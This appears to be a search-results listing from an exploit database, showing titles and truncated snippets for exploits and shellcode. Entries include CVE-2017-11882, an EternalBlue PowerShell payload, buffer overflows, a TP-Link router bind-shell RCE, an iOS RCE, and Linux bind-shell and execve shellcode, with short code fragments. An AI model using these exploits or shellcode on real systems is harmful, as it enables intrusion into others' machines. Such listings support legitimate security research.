7258 matches found
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2017-11882 Exploit CVE-2017-11882 Exploit accepts over 17...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2017-11882 Exploit CVE-2017-11882 Exploit accepts over 17...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2017-11882 43b The original script comes from https://git...
Excalibur - An Eternalblue exploit payload based Powershell
Excalibur is an Eternalblue exploit based "Powershell" for the Bashbunny project. It's purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain. Excalibur may be used only for demostrations purposes only, and the developers are not responsible to any misuse or illeagal...
VX Search 10.2.14 - Proxy Local Buffer Overflow (SEH)
VX Search 10.2.14 - Proxy Local Buffer Overflow SEH !/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version :...
Dup Scout Enterprise 10.0.18 Buffer Overflow
Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser parser.addargument'--host', required=True args =...
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...
Jnes 1.0.2 - Stack Buffer Overflow
Jnes 1.0.2 - Stack Buffer Overflow !/usr/bin/env python coding: utf-8 Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow Date: 3-11-2017 Exploit Author: crashmanucoot Contact: twitter.com/crashmanucoot Vendor Homepage: http://www.jabosoft.com/home Software Link:...
ASLRay - Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying
Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying. Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - will work on any x86-64 Debian-based OS BASH - the whole script Limitations: Stack needs to be executable -z execstack Binary has...
DameWare Remote Controller 12.0.0.520 Remote Code Execution
Exploit Title: Dameware Remote Controller RCE Date: 3-04-2016 Exploit Author: Securifera Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx Version: 12.0.0.520 Website:...
TP-Link WR940N - Authenticated Remote Code Exploit Exploit
Exploit for hardware platform in category web applications import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can...
Apple iOS 10.2 (14C92) - Remote Code Execution Exploit
Exploit for iOS platform in category remote exploits Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317c3 The exploit achieves R/W access to the host's physical memory. This exploit has been tested on the iPhone 7, iOS 10.2 14C92. To run the exploit against different devices o...
TP-Link WR940N - (Authenticated) Remote Code
import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in the code if you wish\n" "This exploit require...
Apple iOS 10.2 (14C92) - Remote Code Execution
Apple iOS 10.2 14C92 - Remote Code Execution Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317c3 The exploit achieves R/W access to the host's physical memory. This exploit has been tested on the iPhone 7, iOS 10.2 14C92. To run the exploit against different devices or...
Windows/x64 - API Hooking Shellcode (117 bytes)
/ Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : email protected Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks DeteleFileW API Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to...
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
.class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table border-spacing: 0px; var ntdllBase = ""; function infoleak var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe;...
TP-Link WR940N - (Authenticated) Remote Code
TP-Link WR940N - Authenticated Remote Code import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...
Windows x64 - API Hooking Shellcode (117 bytes)
Windows x64 - API Hooking Shellcode 117 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : [email protected] Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks...
drinkme - Shellcode Testing Harness
drinkme is a shellcode test harness. It reads shellcode from stdin and executes it. This allows pentesters to quickly test their payloads before deployment. Formats drinkme can handle shellcode in the following formats: "0x" "\x" "x" "" For example, NOP could be represented as any of "0x90",...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
/ Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux ----------------- Assembly code ------------------- global start section .text start: xor eax, eax push eax m...